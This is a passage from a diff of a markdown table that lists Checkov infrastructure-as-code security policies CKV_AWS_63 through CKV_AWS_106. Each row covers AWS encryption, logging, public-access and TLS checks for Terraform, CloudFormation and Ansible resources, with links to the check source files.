+| 300 | CKV_AWS_63 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 301 | CKV_AWS_63 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 302 | CKV_AWS_63 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 303 | CKV_AWS_64 | resource | AWS::Redshift::Cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Cloudformation | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterEncryption.py) |
+| 304 | CKV_AWS_64 | resource | aws_redshift_cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Terraform | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py) |
+| 305 | CKV_AWS_65 | resource | AWS::ECS::Cluster | Ensure container insights are enabled on ECS cluster | Cloudformation | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSClusterContainerInsights.py) |
+| 306 | CKV_AWS_65 | resource | aws_ecs_cluster | Ensure container insights are enabled on ECS cluster | Terraform | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py) |
+| 307 | CKV_AWS_66 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group specifies retention days | Cloudformation | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupRetention.py) |
+| 308 | CKV_AWS_66 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group specifies retention days | Terraform | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py) |
+| 309 | CKV_AWS_67 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail is enabled in all Regions | Cloudformation | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailMultiRegion.py) |
+| 310 | CKV_AWS_67 | resource | aws_cloudtrail | Ensure CloudTrail is enabled in all Regions | Terraform | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py) |
+| 311 | CKV_AWS_68 | resource | AWS::CloudFront::Distribution | CloudFront Distribution should have WAF enabled | Cloudformation | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFEnabled.py) |
+| 312 | CKV_AWS_68 | resource | aws_cloudfront_distribution | CloudFront Distribution should have WAF enabled | Terraform | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py) |
+| 313 | CKV_AWS_69 | resource | AWS::AmazonMQ::Broker | Ensure Amazon MQ Broker should not have public access | Cloudformation | [AmazonMQBrokerPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AmazonMQBrokerPublicAccess.py) |
+| 314 | CKV_AWS_69 | resource | aws_mq_broker | Ensure MQ Broker is not publicly exposed | Terraform | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py) |
+| 315 | CKV_AWS_70 | resource | aws_s3_bucket | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) |
+| 316 | CKV_AWS_70 | resource | aws_s3_bucket_policy | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) |
+| 317 | CKV_AWS_71 | resource | AWS::Redshift::Cluster | Ensure Redshift Cluster logging is enabled | Cloudformation | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterLogging.py) |
+| 318 | CKV_AWS_71 | resource | aws_redshift_cluster | Ensure Redshift Cluster logging is enabled | Terraform | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py) |
+| 319 | CKV_AWS_72 | resource | aws_sqs_queue_policy | Ensure SQS policy does not allow ALL (*) actions. | Terraform | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py) |
+| 320 | CKV_AWS_73 | resource | AWS::ApiGateway::Stage | Ensure API Gateway has X-Ray Tracing enabled | Cloudformation | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py) |
+| 321 | CKV_AWS_73 | resource | AWS::Serverless::Api | Ensure API Gateway has X-Ray Tracing enabled | Cloudformation | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py) |
+| 322 | CKV_AWS_73 | resource | aws_api_gateway_stage | Ensure API Gateway has X-Ray Tracing enabled | Terraform | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py) |
+| 323 | CKV_AWS_74 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Cloudformation | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBEncryption.py) |
+| 324 | CKV_AWS_74 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Terraform | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py) |
+| 325 | CKV_AWS_75 | resource | aws_globalaccelerator_accelerator | Ensure Global Accelerator accelerator has flow logs enabled | Terraform | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py) |
+| 326 | CKV_AWS_76 | resource | AWS::ApiGateway::Stage | Ensure API Gateway has Access Logging enabled | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py) |
+| 327 | CKV_AWS_76 | resource | AWS::Serverless::Api | Ensure API Gateway has Access Logging enabled | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py) |
+| 328 | CKV_AWS_76 | resource | aws_api_gateway_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) |
+| 329 | CKV_AWS_76 | resource | aws_apigatewayv2_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) |
+| 330 | CKV_AWS_77 | resource | aws_athena_database | Ensure Athena Database is encrypted at rest (default is unencrypted) | Terraform | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py) |
+| 331 | CKV_AWS_78 | resource | AWS::CodeBuild::Project | Ensure that CodeBuild Project encryption is not disabled | Cloudformation | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CodeBuildProjectEncryption.py) |
+| 332 | CKV_AWS_78 | resource | aws_codebuild_project | 
Ensure that CodeBuild Project encryption is not disabled | Terraform | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py) | +| 333 | CKV_AWS_79 | resource | AWS::EC2::LaunchTemplate | Ensure Instance Metadata Service Version 1 is not enabled | Cloudformation | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py) | +| 334 | CKV_AWS_79 | resource | aws_instance | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 335 | CKV_AWS_79 | resource | aws_launch_configuration | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 336 | CKV_AWS_79 | resource | aws_launch_template | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 337 | CKV_AWS_80 | resource | AWS::MSK::Cluster | Ensure MSK Cluster logging is enabled | Cloudformation | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py) | +| 338 | CKV_AWS_80 | resource | aws_msk_cluster | Ensure MSK Cluster logging is enabled | Terraform | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py) | +| 339 | CKV_AWS_81 | resource | AWS::MSK::Cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Cloudformation | 
[MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py) | +| 340 | CKV_AWS_81 | resource | aws_msk_cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Terraform | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py) | +| 341 | CKV_AWS_82 | resource | AWS::Athena::WorkGroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Cloudformation | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py) | +| 342 | CKV_AWS_82 | resource | aws_athena_workgroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Terraform | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py) | +| 343 | CKV_AWS_83 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain enforces HTTPS | Cloudformation | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 344 | CKV_AWS_83 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 345 | CKV_AWS_83 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 346 | CKV_AWS_84 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch 
Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 347 | CKV_AWS_84 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 348 | CKV_AWS_84 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 349 | CKV_AWS_84 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 350 | CKV_AWS_85 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB Logging is enabled | Cloudformation | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py) | +| 351 | CKV_AWS_85 | resource | aws_docdb_cluster | Ensure DocumentDB Logging is enabled | Terraform | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py) | +| 352 | CKV_AWS_86 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution has Access Logging enabled | Cloudformation | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py) | +| 353 | CKV_AWS_86 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has Access Logging enabled | Terraform | 
[CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py) | +| 354 | CKV_AWS_87 | resource | AWS::Redshift::Cluster | Redshift cluster should not be publicly accessible | Cloudformation | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py) | +| 355 | CKV_AWS_87 | resource | aws_redshift_cluster | Redshift cluster should not be publicly accessible | Terraform | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py) | +| 356 | CKV_AWS_88 | resource | AWS::EC2::Instance | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | +| 357 | CKV_AWS_88 | resource | AWS::EC2::LaunchTemplate | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | +| 358 | CKV_AWS_88 | resource | [?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 359 | CKV_AWS_88 | resource | [?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 360 | CKV_AWS_88 | resource | [].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. 
| Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 361 | CKV_AWS_88 | resource | [].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 362 | CKV_AWS_88 | resource | [].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 363 | CKV_AWS_88 | resource | [].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 364 | CKV_AWS_88 | resource | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 365 | CKV_AWS_88 | resource | [].block[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 366 | CKV_AWS_88 | resource | [].tasks[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 367 | CKV_AWS_88 | resource | [].tasks[?"ec2_instance" != null][] | EC2 instance should not have public IP. 
| Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 368 | CKV_AWS_88 | resource | [].tasks[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 369 | CKV_AWS_88 | resource | [].tasks[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 370 | CKV_AWS_88 | resource | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 371 | CKV_AWS_88 | resource | [].tasks[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 372 | CKV_AWS_88 | resource | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 373 | CKV_AWS_88 | resource | [].tasks[].block[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 374 | CKV_AWS_88 | resource | aws_instance | EC2 instance should not have public IP. 
| Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | +| 375 | CKV_AWS_88 | resource | aws_launch_template | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | +| 376 | CKV_AWS_89 | resource | AWS::DMS::ReplicationInstance | DMS replication instance should not be publicly accessible | Cloudformation | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | +| 377 | CKV_AWS_89 | resource | aws_dms_replication_instance | DMS replication instance should not be publicly accessible | Terraform | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | +| 378 | CKV_AWS_90 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB TLS is not disabled | Cloudformation | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py) | +| 379 | CKV_AWS_90 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB TLS is not disabled | Terraform | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py) | +| 380 | CKV_AWS_91 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure the ELBv2 (Application/Network) has access logging enabled | Cloudformation | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py) | +| 381 | CKV_AWS_91 | resource | aws_alb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | 
[ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | +| 382 | CKV_AWS_91 | resource | aws_lb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | +| 383 | CKV_AWS_92 | resource | AWS::ElasticLoadBalancing::LoadBalancer | Ensure the ELB has access logging enabled | Cloudformation | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py) | +| 384 | CKV_AWS_92 | resource | aws_elb | Ensure the ELB has access logging enabled | Terraform | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py) | +| 385 | CKV_AWS_93 | resource | aws_s3_bucket | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | +| 386 | CKV_AWS_93 | resource | aws_s3_bucket_policy | Ensure S3 bucket policy does not lockout all but root user. 
(Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | +| 387 | CKV_AWS_94 | resource | AWS::Glue::DataCatalogEncryptionSettings | Ensure Glue Data Catalog Encryption is enabled | Cloudformation | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py) | +| 388 | CKV_AWS_94 | resource | aws_glue_data_catalog_encryption_settings | Ensure Glue Data Catalog Encryption is enabled | Terraform | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py) | +| 389 | CKV_AWS_95 | resource | AWS::ApiGatewayV2::Stage | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | +| 390 | CKV_AWS_95 | resource | AWS::Serverless::HttpApi | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | +| 391 | CKV_AWS_96 | resource | AWS::RDS::DBCluster | Ensure all data stored in Aurora is securely encrypted at rest | Cloudformation | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py) | +| 392 | CKV_AWS_96 | resource | aws_rds_cluster | Ensure all data stored in Aurora is securely encrypted at rest | Terraform | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py) | +| 393 | CKV_AWS_97 | resource | AWS::ECS::TaskDefinition | Ensure Encryption in transit 
is enabled for EFS volumes in ECS Task definitions | Cloudformation | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | +| 394 | CKV_AWS_97 | resource | aws_ecs_task_definition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Terraform | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | +| 395 | CKV_AWS_98 | resource | aws_sagemaker_endpoint_configuration | Ensure all data stored in the Sagemaker Endpoint is securely encrypted at rest | Terraform | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py) | +| 396 | CKV_AWS_99 | resource | AWS::Glue::SecurityConfiguration | Ensure Glue Security Configuration Encryption is enabled | Cloudformation | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py) | +| 397 | CKV_AWS_99 | resource | aws_glue_security_configuration | Ensure Glue Security Configuration Encryption is enabled | Terraform | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py) | +| 398 | CKV_AWS_100 | resource | AWS::EKS::Nodegroup | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Cloudformation | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | +| 399 | CKV_AWS_100 | resource | aws_eks_node_group | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Terraform | 
[EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | +| 400 | CKV_AWS_101 | resource | AWS::Neptune::DBCluster | Ensure Neptune logging is enabled | Cloudformation | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py) | +| 401 | CKV_AWS_101 | resource | aws_neptune_cluster | Ensure Neptune logging is enabled | Terraform | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py) | +| 402 | CKV_AWS_102 | resource | aws_neptune_cluster_instance | Ensure Neptune Cluster instance is not publicly available | Terraform | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py) | +| 403 | CKV_AWS_103 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure that Load Balancer Listener is using at least TLS v1.2 | Cloudformation | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py) | +| 404 | CKV_AWS_103 | resource | aws_alb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 405 | CKV_AWS_103 | resource | aws_lb | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 406 | CKV_AWS_103 | resource | aws_lb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | 
[AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 407 | CKV_AWS_104 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB has audit logs enabled | Cloudformation | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py) | +| 408 | CKV_AWS_104 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB has audit logs enabled | Terraform | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py) | +| 409 | CKV_AWS_105 | resource | AWS::Redshift::ClusterParameterGroup | Ensure Redshift uses SSL | Cloudformation | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py) | +| 410 | CKV_AWS_105 | resource | aws_redshift_parameter_group | Ensure Redshift uses SSL | Terraform | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py) | +| 411 | CKV_AWS_106 | resource | aws_ebs_encryption_by_default | Ensure EBS default encryption is enabled | Terraform | 